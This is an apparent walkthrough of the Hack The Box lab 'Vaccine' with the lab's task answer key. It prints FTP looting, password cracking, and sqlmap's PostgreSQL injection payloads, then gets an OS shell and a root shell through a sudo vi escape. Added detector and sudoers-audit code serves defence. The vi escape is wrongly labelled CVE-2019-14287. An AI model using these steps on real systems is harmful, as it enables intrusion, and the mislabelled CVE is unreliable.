Penetration testing is not simple: it requires a lot of
technical knowledge and the ability to think outside the box. Sometimes
you will find simple yet dangerous vulnerabilities; other times you will find
vulnerabilities with public exploits that give you easy
access to the system.
In reality, most of the time you will find
many different vulnerabilities and misconfigurations that you have to
chain together in order to access the target machine, or
you will find a system that has no vulnerabilities but a weak
password that grants you access.
Vaccine is the machine
that teaches us that enumeration is always the key, even if the system seems
secure. It also teaches us how important password
cracking is; it is surprising how many people do not use strong passwords.
Enumeration
Click on Spawn Machine to find out the target IP.
As usual, we start off with an Nmap scan:
┌──(mrdev㉿mrdev)-[~]
└─$ nmap -sC -sV 10.129.57.185
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-29 00:51 IST
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.67 seconds
┌──(mrdev㉿mrdev)-[~]
└─$
There are three open ports: 21 (FTP), 22 (SSH), and 80 (HTTP).
Since we don't have any credentials for the SSH service, we will start with port 21, since the Nmap scan shows that it allows anonymous login.
Accessing FTP Server Anonymously with FTP Client Tool
We can see that there is a backup.zip file available; we will download it. It will be saved in the directory from which we established
the FTP connection.
┌──(mrdev㉿mrdev)-[~]
└─$ ftp 10.129.57.185
Connected to 10.129.57.185.
220 (vsFTPd 3.0.3)
Name (10.129.57.185:mrdev): Anonymous
331 Please specify the password.
Password: # password not required
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir # list files and directories
229 Entering Extended Passive Mode (|||10967|)
150 Here comes the directory listing.
-rwxr-xr-x 1 0 0 2533 Apr 13 2021 backup.zip
226 Directory send OK.
ftp> get backup.zip # download the backup.zip file
local: backup.zip remote: backup.zip
229 Entering Extended Passive Mode (|||10129|)
150 Opening BINARY mode data connection for backup.zip (2533 bytes).
100% |**************************************************************************| 2533 514.05 KiB/s 00:00 ETA 226 Transfer complete.
2533 bytes received in 00:00 (7.79 KiB/s)
ftp> bye
221 Goodbye.
┌──(mrdev㉿mrdev)-[~]
└─$
Run the ls command to confirm that the file was downloaded:
Decrypting Password-Protected ZIP Files with John The Ripper
John the Ripper comes pre-installed with Parrot OS &
Kali Linux, however, if you don't have it, you can install it from the
repository.
# sudo apt-get install john
To crack the password, we first have to
extract a crackable hash from the ZIP archive using the zip2john utility that ships with John
the Ripper.
┌──(mrdev㉿mrdev)-[~]
└─$ zip2john backup.zip > hashes
Once the hash file is ready, run the command below to load the wordlist; John will run a dictionary
attack against the hash stored in the file hashes.
┌──(mrdev㉿mrdev)-[~]
└─$ john --wordlist=rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Inside the archive we can see the admin credentials, which we might be able
to use. The password, however, is hashed; it looks like MD5, so let's try to crack it online (https://crackstation.net/).
The cracked password is qwerty789. Now we open a web
browser to enumerate port 80 and see where we can log in.
We can see a login page; by supplying the previously found
username and the cracked password, we log in successfully!
Foothold
The dashboard has nothing special in it; however, it has
a catalog, which is probably backed by a database.
Let's run any search query:
Looking at the URL, we can see a parameter named
search that is responsible for searching the catalog. We could test it
manually for SQL injection, but instead we will use a
tool called sqlmap.
Acquiring OS Shell Access via SQL Injection with sqlmap
sqlmap comes pre-installed with Parrot OS & Kali
Linux; if you don't have it, install it from the repository with
the following command:
# sudo apt-get install sqlmap
To see how to use it, type the following command:
┌─[mrdev@TS]─[~]
└──╼ $sqlmap --help
___
__H__
___ ___[(]_____ ___ ___ {1.5.12#stable}
|_ -| . [)] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
Usage: python3 sqlmap [options]
Options:
-h, --help Show basic help message and exit
-hh Show advanced help message and exit
--version Show program's version number and exit
-v VERBOSE Verbosity level: 0-6 (default 1)
Target:
At least one of these options has to be provided to define the
-g GOOGLEDORK Process Google dork results as target URLs
Request:
These options can be used to specify how to connect to the target URL
--data=DATA Data string to be sent through POST (e.g. "id=1")
--cookie=COOKIE HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--random-agent Use randomly selected HTTP User-Agent header value
--proxy=PROXY Use a proxy to connect to the target URL
--tor Use Tor anonymity network
--check-tor Check to see if Tor is used properly
Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts
-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to provided value
Detection:
These options can be used to customize the detection phase
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (1-3, default 1)
Techniques:
These options can be used to tweak testing of specific SQL injection
techniques
--technique=TECH.. SQL injection techniques to use (default "BEUSTQ")
Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables
-a, --all Retrieve everything
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--passwords Enumerate DBMS users password hashes
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table(s) to enumerate
-C COL DBMS database table column(s) to enumerate
Operating system access:
These options can be used to access the back-end database management
system underlying operating system
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an OOB shell, Meterpreter or VNC
General:
These options can be used to set some general working parameters
--batch Never ask for user input, use the default behavior
--flush-session Flush session files for current target
Miscellaneous:
These options do not fit into any other category
--wizard Simple wizard interface for beginner users
┌─[mrdev@TS]─[~]
└──╼ $
We will provide the URL and the cookie to sqlmap so
that it can find the vulnerability. The cookie is needed
because the search page requires authentication.
To grab the cookie, we can intercept any request in Burp
Suite and copy it from there; alternatively, you can install a handy browser
extension called cookie-editor.
Once the installation is complete, you can copy the cookies from cookie-editor. Cookies in HTTP
request messages are usually set the following way.
The tool will ask you some questions; you
can answer 'Yes' or 'No', or just press ENTER to accept the default
answer.
___
__H__
___ ___[,]_____ ___ ___ {1.5.12#stable}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 01:50:33 /2021-12-29/
[01:50:35] [INFO] testing connection to the target URL
[01:50:36] [INFO] checking if the target is protected by some kind of WAF/IPS
[01:50:37] [INFO] testing if the target URL content is stable
[01:50:38] [INFO] target URL content is stable
[01:50:38] [INFO] testing if GET parameter 'search' is dynamic
[01:50:38] [WARNING] GET parameter 'search' does not appear to be dynamic
[01:50:39] [INFO] heuristic (basic) test shows that GET parameter 'search' might be injectable (possible DBMS: 'PostgreSQL')
[01:50:39] [INFO] testing for SQL injection on GET parameter 'search'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n] Y
[01:51:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:51:36] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable
[01:51:36] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:51:47] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable
[01:51:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
Out of this output, the important part is the
following:
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
The tool confirmed that the target is vulnerable to SQL
injection, which is everything we needed to know.
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 34 HTTP(s) requests:
---
Parameter: search (GET)
Type: boolean-based blind
Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
Payload: search=any query' AND (SELECT (CASE WHEN (3932=3932) THEN NULL ELSE CAST((CHR(73)||CHR(76)||CHR(89)||CHR(65)) AS NUMERIC) END)) IS NULL-- BeDf
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: search=any query' AND 6776=CAST((CHR(113)||CHR(113)||CHR(98)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (6776=6776) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(120)||CHR(120)||CHR(113)) AS NUMERIC)-- xFOh
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: search=any query';SELECT PG_SLEEP(5)--
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: search=any query' AND 7887=(SELECT 7887 FROM PG_SLEEP(5))-- qpAd
---
[01:51:51] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (focal or eoan)
web application technology: Apache 2.4.41
[01:51:54] [INFO] fetched data logged to text files under '/home/mrdev/.local/share/sqlmap/output/10.129.57.185'
[*] ending @ 01:51:54 /2021-12-29/
┌──(mrdev㉿mrdev)-[~]
└─$
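As an added example (not from the original write-up), here is a small Python detector that picks the sqlmap test payloads shown above out of Apache access logs: it URL-decodes each query parameter and matches the PostgreSQL-specific markers (PG_SLEEP, CHR/CAST error probes, stacked ';SELECT', comment terminators) as well as sqlmap's default User-Agent. The log lines are constructed to mirror the payloads reported above; the client addresses and the dashboard.php path are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-log lines modelled on the sqlmap payloads above.
# Client addresses, timestamps and the path are placeholders, not real server data.
SAMPLE_LOG = """\
10.10.14.5 - - [29/Dec/2021:01:51:36 +0000] "GET /dashboard.php?search=any+query%27%3BSELECT+PG_SLEEP%285%29-- HTTP/1.1" 200 1593 "-" "sqlmap/1.5.12#stable (https://sqlmap.org)"
10.10.14.5 - - [29/Dec/2021:01:51:47 +0000] "GET /dashboard.php?search=any+query%27+AND+7887%3D%28SELECT+7887+FROM+PG_SLEEP%285%29%29--+qpAd HTTP/1.1" 200 1593 "-" "Mozilla/5.0"
10.10.14.5 - - [29/Dec/2021:01:51:39 +0000] "GET /dashboard.php?search=any+query%27+AND+6776%3DCAST%28%28CHR%28113%29%7C%7CCHR%28113%29%29+AS+NUMERIC%29--+xFOh HTTP/1.1" 200 1593 "-" "Mozilla/5.0"
10.10.14.9 - - [29/Dec/2021:01:52:01 +0000] "GET /dashboard.php?search=Blue+Car HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'\d+ \d+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Signatures for the PostgreSQL techniques sqlmap reported against 'search'.
SIGNATURES = {
    "time-based (pg_sleep)": re.compile(r"pg_sleep\s*\(", re.I),
    "stacked query": re.compile(r"'\s*;\s*(select|insert|update|delete|copy|create|drop)\b", re.I),
    "error-based (cast/chr)": re.compile(r"cast\s*\(.*\bchr\s*\(\s*\d+\s*\)", re.I | re.S),
    "boolean tautology": re.compile(r"\b(\d+)\s*=\s*\1\b"),
    "comment terminator": re.compile(r"--(\s+\w+)?\s*$"),
}

def analyse_request(line):
    """Parse one log line; return {'ip', 'hits', 'sqlmap_ua'} or None if it is not a request line.
    'hits' lists (parameter, [signature names]) for every query parameter that matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = []
    # parse_qsl percent-decodes and turns '+' into spaces, so the signatures see the raw SQL
    for param, value in parse_qsl(urlsplit(m.group("path")).query, keep_blank_values=True):
        names = [name for name, rx in SIGNATURES.items() if rx.search(value)]
        if names:
            hits.append((param, names))
    return {"ip": m.group("ip"), "hits": hits, "sqlmap_ua": "sqlmap" in m.group("ua").lower()}

def scan_log(text):
    """Return only the requests that matched a signature or carried sqlmap's default User-Agent."""
    alerts = []
    for line in text.splitlines():
        r = analyse_request(line)
        if r and (r["hits"] or r["sqlmap_ua"]):
            alerts.append(r)
    return alerts
```

A real deployment would also alert on the burst of requests from one client in a few seconds, which is visible in the timestamps even when the payload is obfuscated.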
Now we run sqlmap
once more with the --os-shell flag, which uses the injection
to execute operating system commands on the server.
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[02:14:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (GET)
Type: boolean-based blind
Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
Payload: search=any query' AND (SELECT (CASE WHEN (3932=3932) THEN NULL ELSE CAST((CHR(73)||CHR(76)||CHR(89)||CHR(65)) AS NUMERIC) END)) IS NULL-- BeDf
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: search=any query' AND 6776=CAST((CHR(113)||CHR(113)||CHR(98)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (6776=6776) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(120)||CHR(120)||CHR(113)) AS NUMERIC)-- xFOh
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: search=any query';SELECT PG_SLEEP(5)--
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: search=any query' AND 7887=(SELECT 7887 FROM PG_SLEEP(5))-- qpAd
---
[02:14:38] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[02:14:38] [INFO] fingerprinting the back-end DBMS operating system
[02:14:39] [INFO] the back-end DBMS operating system is Linux
[02:14:40] [INFO] testing if current user is DBA
[02:14:40] [INFO] retrieved: '1'
[02:14:41] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
[02:14:41] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
We got a shell; however, it is not very stable or
interactive.
Establishing a Reverse Shell via the OS Shell Obtained from sqlmap
To make it more stable, we will use a reverse shell payload:
We are running as the postgres user, but we don't know its password,
which means we cannot check our sudo privileges. We will try to find the password in the html folder, since
the application uses both PHP & SQL, meaning that there should be database credentials
stored in cleartext:
Before that, I have to change directories back to the home
directory:
postgres@vaccine:/var/lib/postgresql/11/main$ cd ../../../../..
cd ../../../../..
postgres@vaccine:/$ cd /var/www/html
cd /var/www/html
postgres@vaccine:/var/www/html$ ls
ls
bg.png dashboard.js index.php style.css
dashboard.css dashboard.php license.txt
postgres@vaccine:/var/www/html$
Now let me read the dashboard.php file using the cat command:
User postgres may run the following commands on vaccine:
(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
postgres@vaccine:~$
sudo privilege escalation via vi editor (CVE-2019-14287)
So we have sudo privileges to edit the /etc/postgresql/11/main/pg_hba.conf file
using the vi text editor (/bin/vi). Open the file with sudo, then from within vi type ":!/bin/bash" and hit Enter to drop into a root shell.
The root flag can be obtained in the root folder:
root@vaccine:/var/lib/postgresql# whoami
root
root@vaccine:/var/lib/postgresql# cd /root
root@vaccine:~# ls
pg_hba.conf root.txt snap
root@vaccine:~# cat root.txt
dd****************************9
root@vaccine:~#
We successfully got the root flag, congratulations!
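As an added example (not part of the original write-up), the following Python audits sudoers-style rules for exactly this class of finding: a command whitelist that grants an editor or pager, which has a shell escape and therefore hands the user a root shell. The sample rules are constructed; only the postgres line reflects the sudo -l output above, and the suggested fix for editing a single config file as root is sudoedit.

```python
import re

# Constructed sudoers-style rules (not the box's real /etc/sudoers): the postgres
# line mirrors what 'sudo -l' reported above, the others are invented for contrast.
SAMPLE_SUDOERS = """\
root     ALL=(ALL:ALL) ALL
postgres ALL=(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
deploy   ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart app
backup   ALL=(root) /usr/bin/less /var/log/syslog
dba      ALL=(ALL) sudoedit /etc/postgresql/11/main/pg_hba.conf
"""

# Programs that hand the caller a shell or arbitrary command once started as root (editors, pagers, interpreters, find -exec).
SHELL_ESCAPE_BINARIES = {"vi", "vim", "nano", "less", "more", "man", "find", "awk", "perl", "python3", "env", "bash", "sh"}

RULE_RE = re.compile(r"^(?P<who>\S+)\s+\S+\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")

def parse_rule(line):
    """Return (user, runas, [(command, [tags])]) for one sudoers line, or None for blank/comment lines."""
    line = line.split("#", 1)[0].strip()
    m = RULE_RE.match(line) if line else None
    if not m:
        return None
    cmds = []
    for spec in m.group("cmds").split(","):
        spec, tags = spec.strip(), []
        while re.match(r"[A-Z]+:", spec):             # peel NOPASSWD:, NOEXEC:, ... prefixes
            tag, spec = spec.split(":", 1)
            tags.append(tag)
            spec = spec.strip()
        cmds.append((spec, tags))
    return m.group("who"), m.group("runas") or m.group("who"), cmds

def audit_rule(line):
    """Return finding strings for one sudoers line; an empty list means nothing was flagged."""
    parsed = parse_rule(line)
    if parsed is None:
        return []
    who, runas, cmds = parsed
    findings = []
    for spec, tags in cmds:
        if spec == "ALL":                               # unrestricted sudo is a policy choice, not an escape bug
            continue
        binary = spec.split()[0].rsplit("/", 1)[-1]
        # NOEXEC stops the ':!' escape, but a root editor can still overwrite any file,
        # so for a single config file the right fix is sudoedit, which edits a copy.
        if binary in SHELL_ESCAPE_BINARIES and "NOEXEC" not in tags:
            findings.append(f"{who} may run {binary} as {runas}: shell escape yields a {runas} shell; use sudoedit")
    return findings
```

Running audit_rule over every line of a real sudoers file (and the files under /etc/sudoers.d) gives a quick list of the rules that need rewriting.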
Task Answers
TASK 1: Besides SSH and HTTP, what other service is hosted on this box?
Ans. FTP
TASK 2: This service can be configured to allow login with any password for a specific username. What is that username?
Ans. anonymous
TASK 3: What is the name of the file downloaded over this service?
Ans. backup.zip
TASK 4: What script comes with the John The Ripper toolset and generates a hash from a password-protected zip archive in a format to allow for cracking attempts?
Ans. zip2john
TASK 5: What is the password for the admin user on the website?
Ans. qwerty789
TASK 6: What option can be passed to sqlmap to try to get command execution via the sql injection?
Ans. --os-shell
TASK 7: What program can the postgres user run as root using sudo?